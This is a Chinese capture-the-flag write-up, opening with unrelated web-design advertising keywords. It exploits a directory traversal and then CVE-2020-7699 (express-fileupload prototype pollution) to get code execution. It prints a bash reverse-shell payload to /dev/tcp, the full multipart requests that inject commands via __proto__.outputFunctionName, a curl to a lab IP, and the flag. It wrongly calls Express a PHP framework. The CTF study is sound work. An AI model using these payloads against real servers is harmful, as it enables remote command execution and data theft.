河南郑州做网站的公司旅游网站制作方案

河南郑州做网站的公司,旅游网站制作方案,免费招聘网站招聘,做led视频好的网站拿到靶机首先抓包观察用的是什么服务器和框架发现服务器是Nginx#xff0c;框架是PHP的express框架再用dirsearch扫一遍发现扫出了/static../意味着服务器存在配置错误#xff0c;导致了目录遍历漏洞。当服务器配置不当时#xff0c;特别是处理静态文件路径时#xff0c;攻…拿到靶机首先抓包观察用的是什么服务器和框架发现服务器是Nginx框架是PHP的express框架再用dirsearch扫一遍发现扫出了/static../意味着服务器存在配置错误导致了目录遍历漏洞。当服务器配置不当时特别是处理静态文件路径时攻击者可以利用../上级目录序列突破Web根目录限制访问到服务器上的任意文件。找到源代码app.js许多Web框架如Django、Flask、Express等默认采用/static/作为静态文件目录而源代码一般都为app.js/app.pyconst express require(express); const fileUpload require(express-fileupload); const app express(); app.use(fileUpload({ parseNested: true })); app.post(/4_pATh_y0u_CaNN07_Gu3ss, (req, res) { res.render(flag.ejs); }); app.get(/, (req, res) { res.render(index.ejs); }) app.listen(3000); app.on(listening, function() { console.log(Express server started on port %s at %s, server.address().port, server.address().address); });代码审计app.post(/4_pATh_y0u_CaNN07_Gu3ss, (req, res) { res.render(flag.ejs); });定义了一个POST路由路径是/4_pATh_y0u_CaNN07_Gu3ss当访问此路径时服务器会渲染flag.ejs文件。也许flag就在这个路径里用POST访问/4_pATh_y0u_CaNN07_Gu3ss看到flag在 flag.txt 中但是无法直接访问到 flag.txt再观察源代码app.use(fileUpload({ parseNested: true }));发现代码中使用了express-fileupload中间件且启用了parseNested: true选项也许这里存在CVE-2020-7699NodeJS模块代码注入但这个漏洞仅存在于express-fileupload版本低于1.1.9不包含在package.json中获取版本信息发现为1.1.7低于1.1.9确定存在CVE-2020-7699NodeJS模块代码注入CVE-2020-7699NodeJS模块代码注入漏洞成因express-fileupload中间件在处理文件上传时没有对参数名进行安全校验特别是当启用parseNested: true选项时允许通过特殊构造的参数名直接操作JavaScript对象的原型链。原型链污染攻击者可通过上传含有__proto__或constructor.prototype等特殊字段的文件污染Object的原型从而影响所有JavaScript对象。反弹shell通用payload如下x;process.mainModule.require(child_process).exec(bash -c bash -i /dev/tcp/ip/port 01);xip为公网ipport为探测端口文件复制payload如下:x;process.mainModule.require(child_process).exec(cp /flag.txt /app/static/js/flag.txt);xcpcopy命令用于复制文件基础文件操作/flag.txt源文件路径根目录下的flag文件目标flag所在位置/app/static/js/Web应用静态文件目录可公开访问的目录flag.txt复制后的文件名保持名称不变避免混淆初步探测一下观察是否有过滤构造报文Content-Type: multipart/form-data; boundary---------------------------1546646991721295948201928333 Content-Length: -----------------------------1546646991721295948201928333 Content-Disposition: form-data; name__proto__.outputFunctionName x;console.log(TEST);x -----------------------------1546646991721295948201928333--成功返回看来没有过滤最终利用Content-Type: multipart/form-data; boundary---------------------------1546646991721295948201928333 Content-Length: -----------------------------1546646991721295948201928333 Content-Disposition: form-data; name__proto__.outputFunctionName x;process.mainModule.require(child_process).exec(cp /flag.txt /app/static/js/flag.txt);x -----------------------------1546646991721295948201928333--发送该请求包后flag.txt将被复制到static/js下即可得到flag。curl http://61.147.171.103:58898/static/js/flag.txtcyberpeace{850ffa1d88ce047bcdcf34dbdbcd1e12}